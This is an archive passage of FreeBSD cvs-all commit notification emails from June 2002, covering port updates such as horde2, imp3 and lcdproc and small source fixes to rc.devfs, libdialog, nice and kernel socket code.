Message-Id: <200206180705.g5I75qZ49329@freefall.freebsd.org> From: Doug Barton Date: Tue, 18 Jun 2002 00:05:52 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/textproc/p5-PodParser Makefile ports/textproc/p5-PodParser/files patch-use-ports-File-Spec X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dougb 2002/06/18 00:05:52 PDT Modified files: textproc/p5-PodParser Makefile Added files: textproc/p5-PodParser/files patch-use-ports-File-Spec Log: Maintainer timeout on this, and we've got several users complaining about it. This patch causes the modules to prefer the stuff in PREFIX before the stuff in the base system, which allows it to find the newly installed File::Spec port. tobez has already committed a better fix to the base perl in RELENG_4, but it'll be a while before we can expect that to be commonplace. Revision Changes Path 1.2 +3 -0 ports/textproc/p5-PodParser/Makefile 1.1 +98 -0 ports/textproc/p5-PodParser/files/patch-use-ports-File-Spec (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 0:14:46 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4802537B404; Tue, 18 Jun 2002 00:14:43 -0700 (PDT) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I7Ehq50322; Tue, 18 Jun 2002 00:14:43 -0700 (PDT) (envelope-from dougb) Message-Id: <200206180714.g5I7Ehq50322@freefall.freebsd.org> From: Doug Barton Date: Tue, 18 Jun 2002 00:14:43 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/etc rc.devfs X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dougb 2002/06/18 00:14:43 PDT Modified files: etc rc.devfs Log: Only create symlink if /dev/ttyv0 exists. PR: misc/39381 Submitted by: Dirk-Willem van Gulik Revision Changes Path 1.10 +4 -2 src/etc/rc.devfs To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 0:33:59 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AB6D337B406; Tue, 18 Jun 2002 00:33:56 -0700 (PDT) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I7Xus52281; Tue, 18 Jun 2002 00:33:56 -0700 (PDT) (envelope-from dougb) Message-Id: <200206180733.g5I7Xus52281@freefall.freebsd.org> From: Doug Barton Date: Tue, 18 Jun 2002 00:33:56 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/etc rc.devfs X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dougb 2002/06/18 00:33:56 PDT Modified files: etc rc.devfs Log: Should have paid more attention to the PR. Update (improve?) the examples by doing them in /dev/, and provide more than just the one example. Submitted by: bde (for the ideas, blame for mistakes is mine) Revision Changes Path 1.11 +19 -2 src/etc/rc.devfs To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 0:35:35 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1C08937B406; Tue, 18 Jun 2002 00:35:32 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I7ZWP52470; Tue, 18 Jun 2002 00:35:32 -0700 (PDT) (envelope-from pat) Message-Id: <200206180735.g5I7ZWP52470@freefall.freebsd.org> From: Patrick Li Date: Tue, 18 Jun 2002 00:35:31 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/18 00:35:31 PDT Modified files: . modules Log: Fix error: horde3 doesn't exist, change to horde2 instead Revision Changes Path 1.5377 +1 -1 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 0:37:42 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 67F8337B406; Tue, 18 Jun 2002 00:37:37 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I7bbk52668; Tue, 18 Jun 2002 00:37:37 -0700 (PDT) (envelope-from pat) Message-Id: <200206180737.g5I7bbk52668@freefall.freebsd.org> From: Patrick Li Date: Tue, 18 Jun 2002 00:37:37 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/horde2 Makefile distinfo pkg-descr pkg-message pkg-plist ports/www/horde2/files patch-ac X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/18 00:37:37 PDT Modified files: www/horde2 Makefile distinfo pkg-descr pkg-message pkg-plist www/horde2/files patch-ac Log: Update to 2.1 final, bump PORTREVISION. PR: 39170 Submitted by: maintainer Revision Changes Path 1.14 +1 -2 ports/www/horde2/Makefile 1.6 +1 -1 ports/www/horde2/distinfo 1.5 +66 -104 ports/www/horde2/files/patch-ac 1.6 +2 -1 ports/www/horde2/pkg-descr 1.3 +3 -0 ports/www/horde2/pkg-message 1.7 +8 -0 ports/www/horde2/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 0:39:45 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D45C437B40B; Tue, 18 Jun 2002 00:39:40 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I7de253002; Tue, 18 Jun 2002 00:39:40 -0700 (PDT) (envelope-from pat) Message-Id: <200206180739.g5I7de253002@freefall.freebsd.org> From: Patrick Li Date: Tue, 18 Jun 2002 00:39:40 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/turba Makefile distinfo pkg-plist ports/mail/turba/files patch-ab X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/18 00:39:40 PDT Modified files: mail/turba Makefile distinfo pkg-plist mail/turba/files patch-ab Log: Update to 1.1 final, bump PORTREVISION PR: 39171 Submitted by: maintainer Revision Changes Path 1.10 +3 -3 ports/mail/turba/Makefile 1.6 +1 -1 ports/mail/turba/distinfo 1.4 +7 -28 ports/mail/turba/files/patch-ab 1.8 +12 -4 ports/mail/turba/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 0:41:24 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6CFD137B40F; Tue, 18 Jun 2002 00:41:20 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I7fKL53440; Tue, 18 Jun 2002 00:41:20 -0700 (PDT) (envelope-from pat) Message-Id: <200206180741.g5I7fKL53440@freefall.freebsd.org> From: Patrick Li Date: Tue, 18 Jun 2002 00:41:20 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/chora Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/18 00:41:20 PDT Modified files: devel/chora Makefile distinfo pkg-plist Log: Update to 1.1 final, bump PORTREVISION. PR: 39172 Submitted by: maintainer Revision Changes Path 1.5 +11 -5 ports/devel/chora/Makefile 1.3 +1 -1 ports/devel/chora/distinfo 1.6 +2 -0 ports/devel/chora/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 0:42:23 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4E89637B415; Tue, 18 Jun 2002 00:42:08 -0700 (PDT) Received: (from tanimura@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I7g2353880; Tue, 18 Jun 2002 00:42:02 -0700 (PDT) (envelope-from tanimura) Message-Id: <200206180742.g5I7g2353880@freefall.freebsd.org> From: Seigo Tanimura Date: Tue, 18 Jun 2002 00:42:02 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/kern uipc_socket2.c src/sys/net rtsock.c src/sys/netinet accf_data.c accf_http.c tcp_input.c src/sys/netkey keysock.c src/sys/sys socketvar.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tanimura 2002/06/18 00:42:02 PDT Modified files: sys/kern uipc_socket2.c sys/net rtsock.c sys/netinet accf_data.c accf_http.c tcp_input.c sys/netkey keysock.c sys/sys socketvar.h Log: Remove so*_locked(), which were backed out by mistake. Revision Changes Path 1.96 +11 -51 src/sys/kern/uipc_socket2.c 1.75 +1 -1 src/sys/net/rtsock.c 1.9 +1 -1 src/sys/netinet/accf_data.c 1.13 +3 -3 src/sys/netinet/accf_http.c 1.160 +1 -1 src/sys/netinet/tcp_input.c 1.16 +1 -1 src/sys/netkey/keysock.c 1.83 +9 -19 src/sys/sys/socketvar.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 0:43: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4D27D37B405; Tue, 18 Jun 2002 00:42:59 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I7gx354006; Tue, 18 Jun 2002 00:42:59 -0700 (PDT) (envelope-from pat) Message-Id: <200206180742.g5I7gx354006@freefall.freebsd.org> From: Patrick Li Date: Tue, 18 Jun 2002 00:42:59 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/imp3 Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/18 00:42:59 PDT Modified files: mail/imp3 Makefile distinfo pkg-plist Log: Update to 3.1 final, bump PORTREVISION. PR: 39173 Submitted by: maintainer Revision Changes Path 1.13 +3 -3 ports/mail/imp3/Makefile 1.5 +1 -1 ports/mail/imp3/distinfo 1.6 +13 -5 ports/mail/imp3/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 0:44:40 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 345AC37B410; Tue, 18 Jun 2002 00:44:35 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I7iZc54312; Tue, 18 Jun 2002 00:44:35 -0700 (PDT) (envelope-from pat) Message-Id: <200206180744.g5I7iZc54312@freefall.freebsd.org> From: Patrick Li Date: Tue, 18 Jun 2002 00:44:35 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/deskutils/nag Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/18 00:44:35 PDT Modified files: deskutils/nag Makefile distinfo pkg-plist Log: Update to 1.0 final, bump PORTREVISION. PR: 39175 Submitted by: maintainer Revision Changes Path 1.3 +7 -3 ports/deskutils/nag/Makefile 1.3 +1 -1 ports/deskutils/nag/distinfo 1.2 +18 -0 ports/deskutils/nag/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 0:46:59 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A88D937B410; Tue, 18 Jun 2002 00:46:24 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I7kOg54621; Tue, 18 Jun 2002 00:46:24 -0700 (PDT) (envelope-from pat) Message-Id: <200206180746.g5I7kOg54621@freefall.freebsd.org> From: Patrick Li Date: Tue, 18 Jun 2002 00:46:24 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/deskutils/kronolith Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/18 00:46:24 PDT Modified files: deskutils/kronolith Makefile distinfo pkg-plist Log: Update to 1.0 final, bump PORTREVISION. PR: 39176 Submitted by: maintainer Revision Changes Path 1.8 +7 -3 ports/deskutils/kronolith/Makefile 1.5 +1 -1 ports/deskutils/kronolith/distinfo 1.5 +17 -0 ports/deskutils/kronolith/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 0:50:23 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8AEE237B406; Tue, 18 Jun 2002 00:50:19 -0700 (PDT) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I7oJV55088; Tue, 18 Jun 2002 00:50:19 -0700 (PDT) (envelope-from dougb) Message-Id: <200206180750.g5I7oJV55088@freefall.freebsd.org> From: Doug Barton Date: Tue, 18 Jun 2002 00:50:19 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/etc usbd.conf X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dougb 2002/06/18 00:50:19 PDT Modified files: etc usbd.conf Log: Do vidcontrol -m on after starting moused for a usb mouse. PR: conf/39125 Submitted by: Mike Makonnen Not objected to by: -current and -hackers Revision Changes Path 1.11 +2 -2 src/etc/usbd.conf To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 0:55:59 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C93B337B401; Tue, 18 Jun 2002 00:55:55 -0700 (PDT) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I7ttM55936; Tue, 18 Jun 2002 00:55:55 -0700 (PDT) (envelope-from dougb) Message-Id: <200206180755.g5I7ttM55936@freefall.freebsd.org> From: Doug Barton Date: Tue, 18 Jun 2002 00:55:55 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/gnu/lib/libdialog gauge.c notify.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dougb 2002/06/18 00:55:55 PDT Modified files: (Branch: RELENG_4) gnu/lib/libdialog gauge.c notify.c Log: MFC includes of stdlib.h to bring these totally in line with -current. Not objected to by: wollman Revision Changes Path 1.2.12.2 +2 -0 src/gnu/lib/libdialog/gauge.c 1.6.12.2 +1 -0 src/gnu/lib/libdialog/notify.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 0:57:44 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AA6E637B409; Tue, 18 Jun 2002 00:57:40 -0700 (PDT) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I7veB56078; Tue, 18 Jun 2002 00:57:40 -0700 (PDT) (envelope-from dougb) Message-Id: <200206180757.g5I7veB56078@freefall.freebsd.org> From: Doug Barton Date: Tue, 18 Jun 2002 00:57:40 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/gnu/lib/libdialog raw_popen.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dougb 2002/06/18 00:57:40 PDT Modified files: (Branch: RELENG_4) gnu/lib/libdialog raw_popen.c Log: MFC 1.3 and 1.4. Fixes for the arg to execl(), and the deprecated wait union. Approved by: brian and mike Revision Changes Path 1.2.12.1 +5 -4 src/gnu/lib/libdialog/raw_popen.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 1: 0: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0FFEE37B40C; Tue, 18 Jun 2002 01:00:00 -0700 (PDT) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I800656211; Tue, 18 Jun 2002 01:00:00 -0700 (PDT) (envelope-from dougb) Message-Id: <200206180800.g5I800656211@freefall.freebsd.org> From: Doug Barton Date: Tue, 18 Jun 2002 00:59:59 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/gnu/lib/libdialog textbox.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dougb 2002/06/18 00:59:59 PDT Modified files: (Branch: RELENG_4) gnu/lib/libdialog textbox.c Log: MFC 1.21, my fix to prevent users leaving the text box through valid means from causing dialog(1) to exit with an error code. Revision Changes Path 1.18.6.2 +2 -2 src/gnu/lib/libdialog/textbox.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 1: 6:18 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5050437B400; Tue, 18 Jun 2002 01:06:15 -0700 (PDT) Received: (from jhay@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I86FW61025; Tue, 18 Jun 2002 01:06:15 -0700 (PDT) (envelope-from jhay) Message-Id: <200206180806.g5I86FW61025@freefall.freebsd.org> From: John Hay Date: Tue, 18 Jun 2002 01:06:15 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/awi awi_wicfg.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jhay 2002/06/18 01:06:15 PDT Modified files: (Branch: RELENG_4) sys/dev/awi awi_wicfg.c Log: Follow if_wavelan_ieee.h to its new home. Revision Changes Path 1.3.2.2 +1 -1 src/sys/dev/awi/awi_wicfg.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 1:15:29 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A279337B408; Tue, 18 Jun 2002 01:15:26 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I8FQb62060; Tue, 18 Jun 2002 01:15:26 -0700 (PDT) (envelope-from pat) Message-Id: <200206180815.g5I8FQb62060@freefall.freebsd.org> From: Patrick Li Date: Tue, 18 Jun 2002 01:15:26 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/textproc/pdftohtml Makefile distinfo ports/textproc/pdftohtml/files patch-goo::Makefile patch-src::Makefile patch-xpdf::Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/18 01:15:26 PDT Modified files: textproc/pdftohtml Makefile distinfo Removed files: textproc/pdftohtml/files patch-goo::Makefile patch-src::Makefile patch-xpdf::Makefile Log: Update to 0.34 PR: 39456 Submitted by: maintainer Revision Changes Path 1.5 +9 -3 ports/textproc/pdftohtml/Makefile 1.4 +1 -1 ports/textproc/pdftohtml/distinfo 1.4 +0 -18 ports/textproc/pdftohtml/files/patch-goo::Makefile (dead) 1.2 +0 -18 ports/textproc/pdftohtml/files/patch-src::Makefile (dead) 1.4 +0 -22 ports/textproc/pdftohtml/files/patch-xpdf::Makefile (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 1:38:58 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3959F37B400; Tue, 18 Jun 2002 01:38:54 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I8csY64390; Tue, 18 Jun 2002 01:38:54 -0700 (PDT) (envelope-from pat) Message-Id: <200206180838.g5I8csY64390@freefall.freebsd.org> From: Patrick Li Date: Tue, 18 Jun 2002 01:38:54 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/18 01:38:54 PDT Modified files: . modules Log: lcdproc --> ports/sysutils/lcdproc Revision Changes Path 1.5378 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 1:39: 1 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6E7F337B405; Tue, 18 Jun 2002 01:38:47 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I8clC64353; Tue, 18 Jun 2002 01:38:47 -0700 (PDT) (envelope-from pat) Message-Id: <200206180838.g5I8clC64353@freefall.freebsd.org> From: Patrick Li Date: Tue, 18 Jun 2002 01:38:47 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/sysutils Makefile ports/sysutils/lcdproc Makefile distinfo pkg-comment pkg-descr pkg-plist ports/sysutils/lcdproc/files LCDd.sh.sample X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/18 01:38:47 PDT Modified files: sysutils Makefile Added files: sysutils/lcdproc Makefile distinfo pkg-comment pkg-descr pkg-plist sysutils/lcdproc/files LCDd.sh.sample Log: Add new port lcdproc - A client/server suite for all kinds of nifty LCD devices Revision Changes Path 1.266 +1 -0 ports/sysutils/Makefile 1.1 +35 -0 ports/sysutils/lcdproc/Makefile (new) 1.1 +1 -0 ports/sysutils/lcdproc/distinfo (new) 1.1 +18 -0 ports/sysutils/lcdproc/files/LCDd.sh.sample (new) 1.1 +1 -0 ports/sysutils/lcdproc/pkg-comment (new) 1.1 +18 -0 ports/sysutils/lcdproc/pkg-descr (new) 1.1 +10 -0 ports/sysutils/lcdproc/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 1:41: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 679D537B428; Tue, 18 Jun 2002 01:40:29 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I8eTP64630; Tue, 18 Jun 2002 01:40:29 -0700 (PDT) (envelope-from tjr) Message-Id: <200206180840.g5I8eTP64630@freefall.freebsd.org> From: "Tim J. Robbins" Date: Tue, 18 Jun 2002 01:40:29 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/nice nice.1 nice.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/18 01:40:29 PDT Modified files: (Branch: RELENG_4) usr.bin/nice nice.1 nice.c Log: MFC: SUSv3 conformance (exit status, -n option), style changes nice.c revs. 1.5-1.10, nice.1 revs. 1.18-1.21 Revision Changes Path 1.12.2.6 +46 -39 src/usr.bin/nice/nice.1 1.4.2.1 +40 -20 src/usr.bin/nice/nice.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 1:55:20 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 86C6A37B407; Tue, 18 Jun 2002 01:55:17 -0700 (PDT) Received: (from chris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I8tHG66407; Tue, 18 Jun 2002 01:55:17 -0700 (PDT) (envelope-from chris) Message-Id: <200206180855.g5I8tHG66407@freefall.freebsd.org> From: Chris Costello Date: Tue, 18 Jun 2002 01:55:17 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/lib/libc/stdio printf.3 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG chris 2002/06/18 01:55:17 PDT Modified files: lib/libc/stdio printf.3 Log: Fix style and wording bugs introduced in my last commit. Sponsored by: DARPA, NAI Labs Revision Changes Path 1.41 +9 -11 src/lib/libc/stdio/printf.3 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 2: 5:35 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2C7AF37B406; Tue, 18 Jun 2002 02:05:33 -0700 (PDT) Received: (from 